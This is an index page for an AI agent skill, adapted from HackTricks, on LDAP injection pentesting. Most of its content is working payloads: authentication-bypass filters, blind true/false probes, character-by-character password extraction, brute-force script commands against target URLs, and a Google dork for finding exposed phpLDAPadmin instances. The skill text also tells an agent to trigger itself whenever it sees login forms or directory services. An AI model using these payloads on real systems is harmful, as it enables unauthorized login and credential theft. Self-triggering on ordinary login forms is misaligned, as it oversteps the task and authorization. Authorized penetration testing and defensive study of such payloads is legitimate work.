OpenSkillIndex← back to search

Hacktricks-skills ldap-injection-pentest

Use this skill whenever you need to test for LDAP injection vulnerabilities, analyze LDAP queries, or perform LDAP security assessments. Trigger this skill for any LDAP-related security testing, authentication bypass attempts, directory service penetration testing, or when investigating web applications that use LDAP for authentication. Don't forget to use this skill when you see login forms, directory services, or any application that might be vulnerable to LDAP injection attacks.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/ldap-injection/SKILL.MD
source content

LDAP Injection Pentesting

A comprehensive skill for testing and exploiting LDAP injection vulnerabilities in web applications.

Overview

LDAP Injection is an attack targeting web applications that construct LDAP statements from user input. It occurs when the application fails to properly sanitize input, allowing attackers to manipulate LDAP statements through a local proxy, potentially leading to unauthorized access or data manipulation.

LDAP Filter Syntax

Understanding LDAP filter syntax is essential for crafting injection payloads:

Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = |filterlist
Not = ! filter
Filterlist = 1*filter
Item = simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = '=' / '~=' / '>=' / '<='
Present = attr = *
Substring = attr "=" [initial] * [final]

Key operators:

  • (&)
    = AND (Absolute TRUE)
  • (|)
    = OR (Absolute FALSE)
  • (!)
    = NOT

Example filters:

(&(objectClass=user)(uid=s*))
(&(directory=val1)(folder=public))

Important: The filter must start with 

&
or 
|
. Send only 1 filter to avoid errors on most LDAP servers.

LDAP Server Behaviors

Different LDAP servers handle multiple filters differently:

ServerBehavior with 2 filters
OpenLDAPExecutes only the first one
ADAM / Microsoft LDSThrows an error
SunOne Directory Server 5.0Executes both filters

Login Bypass Techniques

LDAP supports several password formats (clear, md5, smd5, sha1, sha, crypt). Use these payloads to bypass authentication:

Universal Bypass

user=*
password=*
# Results in: (&(user=*)(password=*))

Filter Termination

user=*)(&
password=*)(&
# Results in: (&(user=*)(&)(password=*)(&))

OR Injection

user=*)(|(&
pass=pwd)
# Results in: (&(user=*)(|(&)(pass=pwd))

Password Bypass with OR

user=*)(|(password=*
password=test)
# Results in: (&(user=*)(|(password=*)(password=test))

Null Byte Termination

user=admin))%00
pass=any
# Results in: (&(user=admin))%00 - Nothing more is executed

Complex Bypass

username=admin)(!(&(|
pass=any))
# Results in: (&(uid=admin)(!(&(|)(webpassword=any))))
# As (|) is FALSE, the user is admin and password check is True

Blind LDAP Injection

When you can't see direct output, force True/False responses to confirm vulnerability:

True Response (Information Shown)

Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass=*)(objectClass=*))(&objectClass=void)(type=Pepi*))

False Response (No Information)

Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass=void)(objectClass=void))(&objectClass=void)(type=Pepi*))

Data Extraction

Iterate over ASCII characters to extract data:

(&(sn=administrator)(password=*))    : OK
(&(sn=administrator)(password=A*))   : KO
(&(sn=administrator)(password=B*))   : KO
...
(&(sn=administrator)(password=M*))   : OK
(&(sn=administrator)(password=MA*))  : KO

Testing Scripts

Discover Valid LDAP Fields

Use 

scripts/discover-ldap-fields.py
to brute-force LDAP attributes and extract information:

python3 scripts/discover-ldap-fields.py --url <target-url> --proxy <proxy-url>

This script:

  • Tests common LDAP attributes (uid, cn, sn, mail, etc.)
  • Brute-forces values character by character
  • Identifies which attributes contain data

Blind LDAP Extraction

Use 

scripts/blind-ldap-extract.py
for blind injection without wildcards:

python3 scripts/blind-ldap-extract.py --url <target-url> --max-chars 50

This script:

  • Extracts data one character at a time
  • Works on applications without wildcard support
  • Outputs extracted values in real-time

Common LDAP Attributes

Test these default attributes when brute-forcing:

c, cn, co, commonName, dc, facsimileTelephoneNumber, givenName, gn,
homePhone, id, jpegPhoto, l, mail, mobile, name, o, objectClass, ou,
owner, pager, password, sn, st, surname, uid, username, userPassword

Google Dorks

Find vulnerable applications:

intitle:"phpLDAPadmin" inurl:cmd.php

Testing Workflow

  1. Identify the target - Find login forms or search functionality using LDAP
  2. Test for vulnerability - Try basic payloads like 
    *)(objectClass=*)
  3. Determine server type - Test with multiple filters to identify LDAP server
  4. Choose attack method - Direct injection or blind injection based on response
  5. Extract data - Use scripts or manual iteration to extract credentials/information
  6. Document findings - Record payloads, responses, and extracted data

Payload Resources

Safety Notes

  • Always obtain proper authorization before testing
  • Use a local proxy (Burp Suite, OWASP ZAP) to intercept and modify requests
  • Rate limit your requests to avoid triggering bans
  • Document all findings for remediation
  • Test in isolated environments when possible